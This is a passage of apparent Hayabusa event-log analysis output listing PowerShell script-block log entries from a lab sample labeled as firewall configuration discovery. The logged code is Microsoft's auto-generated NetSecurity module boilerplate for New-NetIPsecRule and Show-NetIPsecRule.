Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultVa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,lue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 
'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] 
[string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 